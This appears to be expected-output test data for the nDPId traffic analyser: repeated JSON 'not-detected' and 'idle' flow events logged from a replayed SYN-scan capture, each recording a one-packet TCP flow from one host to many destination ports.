-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 